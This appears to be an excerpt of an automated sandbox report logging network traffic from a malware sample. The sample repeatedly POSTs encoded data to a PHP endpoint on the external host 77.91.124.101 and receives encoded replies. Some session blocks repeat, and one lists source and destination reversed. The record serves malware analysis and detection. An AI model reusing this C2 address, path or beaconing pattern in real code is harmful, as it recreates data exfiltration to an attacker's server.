                                                            Nov 21, 2023 04:48:55.256391048 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.455446959 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.455835104 CET804984677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.456007957 CET4984680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.457412004 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.457685947 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.654119968 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.654196978 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.654433966 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.850905895 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.850987911 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.856467009 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:55.900782108 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.978568077 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:55.979051113 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:56.191752911 CET804984777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:56.191863060 CET4984780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:56.192356110 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:56.192444086 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:56.192643881 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:56.390408993 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:56.390491009 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:56.431992054 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:57.889027119 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:58.087018013 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:58.087033987 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:58.091731071 CET804984877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:58.135124922 CET4984880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:48:58.694375038 CET804984477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:48:58.695301056 CET4984480192.168.2.577.91.124.101
• 77.91.124.101
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 77.91.124.101 | 80 | 192.168.2.5 | 49712 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:47:24.543304920 CET | 139 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:47:24.740185022 CET | 139 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:47:24.741302967 CET | 140 | OUT | Data Raw / Data Ascii: [payload bytes omitted]
Nov 21, 2023 04:47:25.036397934 CET | 140 | IN | Data Raw / Data Ascii: [payload bytes omitted]
Nov 21, 2023 04:47:25.036421061 CET | 141 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:47:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1340
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                            Nov 21, 2023 04:47:26.359703064 CET142OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.558056116 CET143INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.558262110 CET143OUTData Raw: 57 50 58 51 5b 5b 5a 5d 5d 57 55 57 55 5c 57 5a 50 5f 58 43 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WPXQ[[Z]]WUWU\WZP_XCVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+>(.?0(8$.Z#95\+3=3$*T98*\<Y/>&G''^)/
                                                            Nov 21, 2023 04:47:26.762336969 CET144INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 11 31 11 20 10 21 23 3f 56 3c 29 3d 53 39 00 03 1a 28 20 3e 03 31 3d 34 12 33 29 39 52 3d 3f 30 58 33 3a 37 0c 20 35 23 04 29 1a 21 5a 0c 1d 26 5a 21 2b 2c 0f 29 2e 01 00 2b 04 20 5c 26 1f 0e 05 28 10 33 51 23 0a 30 01 24 20 20 57 2f 3f 3d 5e 2d 3b 3e 06 31 02 2a 1d 23 3d 23 5f 0c 14 27 53 21 1f 28 07 20 09 39 09 35 51 24 5e 37 24 09 1f 27 2e 33 0c 26 2b 21 17 28 06 20 1f 31 19 24 55 30 5c 37 53 26 5f 2b 1e 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1*#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T*+H6ZP
                                                            Nov 21, 2023 04:47:26.782782078 CET144OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.982301950 CET147INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.982625008 CET149OUTData Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
                                                            Nov 21, 2023 04:47:27.184570074 CET149INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70*!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            0 | 192.168.2.5 | 49712 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:24.543304920 CET | 139 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:24.740185022 CET | 139 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:24.741302967 CET | 140 | OUT | Data Raw: 00 0b 04 0c 03 0d 01 07 05 06 02 01 02 03 01 01 00 05 05 0e 02 07 03 0d 00 52 0f 00 03 0f 01 03 0f 02 04 09 01 07 03 05 0b 07 05 04 06 07 04 01 05 05 0c 0e 0f 53 05 52 01 02 04 56 04 55 05 0f 00 04 0f 5c 07 04 01 08 0c 50 0c 54 0a 0d 0f 00 04 04
                                                            Data Ascii: RSRVU\PTRQU\L~hNPvqv]aKt|f_`RxM`c_llcHxYa[hSwQwwZiO~V@xSn}Le
                                                            Nov 21, 2023 04:47:25.036397934 CET | 140 | IN | Data Raw: 64 79 0e 7d 59 7a 63 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55 77 6a 60 03 5c 71 5c 57 5f 6c 58 01 44 68 62 06 41 69 6b 7c 4a 79 5e 56 5f 5a 06 70 43 51 61 5c 40 51 58 01 59 54 01 0c 04 57 64 0c 59 54 57 60
                                                            Data Ascii: dy}Yzcq[F[igASu@c^Fj~CVdU\Uwj`\q\W_lXDhbAik|Jy^V_ZpCQa\@QXYTWdYTW`uUg]|]X_`blZzp]ia@Z}c^RoTkMVrXLboaUwEcg~}^bPUAofzBqZR_ZwE]bSISXD`njE\yoSkkypRh}]hDxkA|YW_P{J]d]FRZKQVTaejqe^}]xA|QN~NtzZ@]odEUqIk^FkdH
                                                            Nov 21, 2023 04:47:25.036421061 CET | 141 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:24 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 1340
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Nov 21, 2023 04:47:26.359703064 CET | 142 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 384
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.558056116 CET | 143 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.558262110 CET | 143 | OUT | Data Raw: 57 50 58 51 5b 5b 5a 5d 5d 57 55 57 55 5c 57 5a 50 5f 58 43 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WPXQ[[Z]]WUWU\WZP_XCVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+>(.?0(8$.Z#95\+3=3$*T98*\<Y/>&G''^)/
                                                            Nov 21, 2023 04:47:26.762336969 CET | 144 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 11 31 11 20 10 21 23 3f 56 3c 29 3d 53 39 00 03 1a 28 20 3e 03 31 3d 34 12 33 29 39 52 3d 3f 30 58 33 3a 37 0c 20 35 23 04 29 1a 21 5a 0c 1d 26 5a 21 2b 2c 0f 29 2e 01 00 2b 04 20 5c 26 1f 0e 05 28 10 33 51 23 0a 30 01 24 20 20 57 2f 3f 3d 5e 2d 3b 3e 06 31 02 2a 1d 23 3d 23 5f 0c 14 27 53 21 1f 28 07 20 09 39 09 35 51 24 5e 37 24 09 1f 27 2e 33 0c 26 2b 21 17 28 06 20 1f 31 19 24 55 30 5c 37 53 26 5f 2b 1e 28 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1*#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T*+H6ZP
                                                            Nov 21, 2023 04:47:26.782782078 CET | 144 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.982301950 CET | 147 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.982625008 CET | 149 | OUT | Data Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
                                                            Nov 21, 2023 04:47:27.184570074 CET | 149 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70*!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)*&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            1 | 192.168.2.5 | 49713 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:26.683871984 CET | 144 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:26.881618023 CET | 145 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:26.881994009 CET | 147 | OUT | Data Raw: 57 5d 5d 5e 5e 5d 5a 50 5d 57 55 57 55 5a 57 52 50 59 58 48 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]]^^]ZP]WUWUZWRPYXHVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=((%=U#[.4) 9)^?3&=.'&T..]+< /.&G''^)7
                                                            Nov 21, 2023 04:47:27.085913897 CET | 149 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            10 | 192.168.2.5 | 49722 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:32.493082047 CET | 179 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.690172911 CET | 181 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.690422058 CET | 183 | OUT | Data Raw: 57 51 58 5f 5e 5e 5a 5b 5d 57 55 57 55 5a 57 51 50 59 58 40 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQX_^^Z[]WUWUZWQPYX@VQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<81*0+;7& )!?U='>P&3",8=+';&G''^)7
                                                            Nov 21, 2023 04:47:32.893771887 CET | 184 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            100 | 77.91.124.101 | 80 | 192.168.2.5 | 49815 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:34.131325960 CET | 559 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1396
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.329173088 CET | 560 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.329386950 CET | 561 | OUT | Data Raw: 57 59 58 5e 5b 5d 5f 59 5d 57 55 57 55 5e 57 55 50 5e 58 40 56 55 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[]_Y]WUWU^WUP^X@VUWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*=X<!>34/$6]#)%_+U=&>:P309-%+ 8&G''^)?
                                                            Nov 21, 2023 04:48:34.532227993 CET | 564 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 03 31 3f 33 05 23 33 33 1e 2b 14 26 0b 2d 00 26 09 28 0d 25 5b 26 04 28 13 26 29 3a 0d 3f 11 24 5b 30 3a 3f 09 34 08 30 5d 29 0a 21 5a 0c 1d 26 5e 21 2b 24 0b 2b 07 38 11 28 13 30 5e 32 32 20 00 3c 2d 33 18 23 1d 33 59 25 23 12 52 2c 06 32 03 39 16 0c 06 25 3c 0c 5b 20 2d 23 5f 0c 14 27 51 22 32 2f 1d 34 33 26 1f 23 37 38 5f 20 27 2b 57 27 3d 28 13 32 06 26 07 3f 38 2f 0e 26 37 3c 1c 27 04 20 0d 26 07 23 55 2b 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !1?3#33+&-&(%[&(&):?$[0:?40])!Z&^!+$+8(0^22 <-3#3Y%#R,29%<[ -#_'Q"2/43&#78_ '+W'=(2&?8/&7<' &#U+&T*+H6ZP


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            101 | 192.168.2.5 | 49816 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:34.258927107 CET | 560 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:34.459631920 CET | 561 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:34.459961891 CET | 564 | OUT | Data Raw: 57 5e 5d 5d 5b 5b 5a 51 5d 57 55 57 55 57 57 53 50 5d 58 42 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]][[ZQ]WUWUWWSP]XBV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\)"=;*R?#/$2_4=X+ "$>!&0.><,8>&G''^)
                                                            Nov 21, 2023 04:48:34.664002895 CET | 565 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            102 | 192.168.2.5 | 49817 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:34.998446941 CET | 566 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:35.196516037 CET | 566 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:35.196736097 CET | 569 | OUT | Data Raw: 52 5a 58 51 5e 5f 5f 59 5d 57 55 57 55 57 57 52 50 58 58 49 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
